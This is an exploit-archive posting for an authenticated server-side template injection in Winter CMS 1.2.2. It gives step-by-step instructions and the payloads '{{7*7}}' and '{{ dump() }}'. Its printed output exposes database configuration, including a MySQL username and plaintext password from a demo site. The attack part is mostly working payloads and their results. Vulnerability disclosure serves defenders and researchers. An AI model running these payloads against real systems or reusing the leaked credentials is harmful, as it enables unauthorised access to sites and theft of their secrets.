Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
#Tested : https://www.softaculous.com/demos/WinterCMS
1 ) Login with admin cred and click CMS > Pages field > Plugin components >
https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview :
https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result :
49
Payload :
{{ dump() }}
Result :
"*::database" => array:4 [▼
"default" => "mysql"
"connections" => array:4 [▼
"sqlite" => array:5 [▼
"database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
"driver" => "sqlite"
"foreign_key_constraints" => true
"prefix" => ""
"url" => null
]
"mysql" => array:15 [▼
"charset" => "utf8mb4"
"collation" => "utf8mb4_unicode_ci"
"database" => "soft_pw3qsny"
"driver" => "mysql"
"engine" => "InnoDB"
"host" => "localhost"
"options" => []
"password" => "8QSz9(pT)3"
"port" => 3306
"prefix" => ""
"prefix_indexes" => true
"strict" => true
"unix_socket" => ""
"url" => null
"username" => "soft_pw3qsny"
]
"pgsql" => array:12 [▶]
"sqlsrv" => array:10 [▶]
]
"migrations" => "migrations"
"redis" => array:4 [▼
"client" => "phpredis"
"options" => array:2 [▼
"cluster" => "redis"
"prefix" => "winter_database_"
]
"default" => array:5 [▼
"database" => "0"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
"cache" => array:5 [▼
"database" => "1"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
]
]
]
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,386)
- Arbitrary[20] (16,427)
- BBS[21] (2,859)
- Bypass[22] (1,803)
- CGI[23] (1,031)
- Code Execution[24] (7,420)
- Conference[25] (683)
- Cracker[26] (843)
- CSRF[27] (3,353)
- DoS[28] (24,044)
- Encryption[29] (2,372)
- Exploit[30] (52,288)
- File Inclusion[31] (4,234)
- File Upload[32] (978)
- Firewall[33] (822)
- Info Disclosure[34] (2,809)
- Intrusion Detection[35] (900)
- Java[36] (3,091)
- JavaScript[37] (880)
- Kernel[38] (6,851)
- Local[39] (14,583)
- Magazine[40] (586)
- Overflow[41] (12,862)
- Perl[42] (1,427)
- PHP[43] (5,162)
- Proof of Concept[44] (2,349)
- Protocol[45] (3,656)
- Python[46] (1,569)
- Remote[47] (31,054)
- Root[48] (3,606)
- Rootkit[49] (515)
- Ruby[50] (614)
- Scanner[51] (1,645)
- Security Tool[52] (7,929)
- Shell[53] (3,213)
- Shellcode[54] (1,216)
- Sniffer[55] (897)
- Spoof[56] (2,229)
- SQL Injection[57] (16,443)
- TCP[58] (2,419)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,105)
- Web[63] (9,789)
- Whitepaper[64] (3,759)
- x86[65] (966)
- XSS[66] (18,055)
- Other[67]
File Archives
- December 2023[68]
- November 2023[69]
- October 2023[70]
- September 2023[71]
- August 2023[72]
- July 2023[73]
- June 2023[74]
- May 2023[75]
- April 2023[76]
- March 2023[77]
- February 2023[78]
- January 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,037)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,914)
- Fedora[87] (1,692)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,379)
- HPUX[90] (880)
- iOS[91] (363)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (47,862)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (486)
- RedHat[100] (14,631)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,142)
- UNIX[105] (9,340)
- UnixWare[106] (187)
- Windows[107] (6,607)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]